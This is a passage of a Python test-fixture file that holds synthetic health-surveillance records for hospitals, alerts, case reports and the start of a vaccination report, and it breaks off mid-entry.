Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_65": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b74', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_66": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b75', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, "cmd_17": 1, "mls_67": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b76', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b77', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b78', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b79', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b80', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b81', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b82', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b83', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b84', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mlp_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b85', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_1": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b86', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_2": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b87', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_3": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b88', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_4": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b89', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_5": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b90', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_6": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b91', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_7": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b92', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_8": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b93', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_9": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b94', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_10": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b95', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_11": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b96', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_12": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b97', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_13": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b98', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_14": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b99', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_15": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b100', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_16": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b101', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_17": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b102', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_18": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b103', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_19": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b104', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_20": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b105', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_21": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b106', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_22": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b107', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_23": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b108', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_24": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b109', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_25": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b110', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_26": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b111', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_27": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b112', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_28": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b113', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_29": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b114', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_30": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b115', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_31": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b116', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_32": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b117', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_33": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b118', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_34": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b119', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_35": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b120', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_36": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b121', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_37": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b122', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_38": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b123', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_39": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b124', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_40": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b125', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_41": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b126', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_42": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b127', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_43": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b128', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_44": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b129', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_45": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b130', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_46": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b131', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_47": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b132', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_48": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b133', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_49": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b134', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_50": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b135', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_51": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b136', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_52": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b137', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_53": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b138', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_54": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b139', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_55": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b140', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_56": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b141', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_57": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b142', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_58": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b143', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_59": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b144', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_60": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b145', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_61": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b146', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_62": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b147', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_63": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b148', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_64": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b149', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_65": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b150', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_66": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b151', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_17": 1, "mls_67": 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:b152', 'country': 1})]
alerts = [
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9341', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce9341", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33', "ale_1": 1,"ale_2":1, "ale_6": 1, "ale_7": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 28, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9342', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_1", "alert_gender": "female", "alert_age": '33'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 55, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9343', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_2", "alert_gender": "female", "alert_age": '33'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 27, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9344', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_2", "alert_gender": "female", "alert_age": '33', "ale_1": 1, "ale_4": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 27, 23, 54, 16, 49059)}),
DisregardedData(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9345', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33', "ale_1": 1213, "ale_3": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 28, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9346', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 3, 4, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9347', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_11", "alert_gender": "female", "alert_age": '33'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9348', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert": 1, "alert_id": "ce93s1", "alert_reason": "cmd_19", "alert_gender": "female", "alert_age": '33'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 20, 23, 54, 16, 49059)})
]
cd_report = [
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11", "ale_1": 1, "ale_2": 1}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9341', 'date': datetime.datetime(2015, 5, 1, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11"}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9342', 'date': datetime.datetime(2015, 5, 2, 0, 0), 'region': 2, 'country': 1}),
# Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11"}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9343', 'date': datetime.datetime(2015, 5, 3, 0, 0), 'region': 2, 'country': 1}),
Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_11"}, 'clinic': 7, 'uuid': 'uuid:b013c24a-4790-43d6-8b43-4d28a4ce9344', 'date': datetime.datetime(2015, 5, 3, 0, 0), 'region': 2, 'country': 1}),
Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_1"}, 'clinic': 10, 'uuid': 'uuid:20b2022f-fbe7-43cb-8467-c569397f3f68', 'date': datetime.datetime(2015, 4, 18, 0, 0), 'region': 2, 'country': 1}),
Data(**{ "variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_1"}, 'clinic': 10, 'uuid': 'uuid:20b2022f-fbe7-43cb-8467-c569397f3f68', 'date': datetime.datetime(2014, 4, 20, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_2"}, 'clinic': 7, 'uuid': 'uuid:c51ea7a2-5e2d-4c83-a9a9-85cce0928509', 'date': datetime.datetime(2015, 3, 2, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_2"}, 'clinic': 7, 'uuid': 'uuid:c51ea7a2-5e2d-4c83-a9a9-85cce0928510', 'date': datetime.datetime(2015, 5, 2, 0, 0), 'region': 2, 'country': 1}),
Data(**{"variables": {"data_entry":1, "alert": 1, "alert_reason": "cmd_19"}, 'clinic': 11, 'uuid': 'uuid:e4e92687-e7e1-4eff-9ec3-4f45421c1e93', 'date': datetime.datetime(2016, 4, 20, 0, 0), 'region': 3, 'country': 1})
]
vaccination_report = [
Data(**{
'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6,
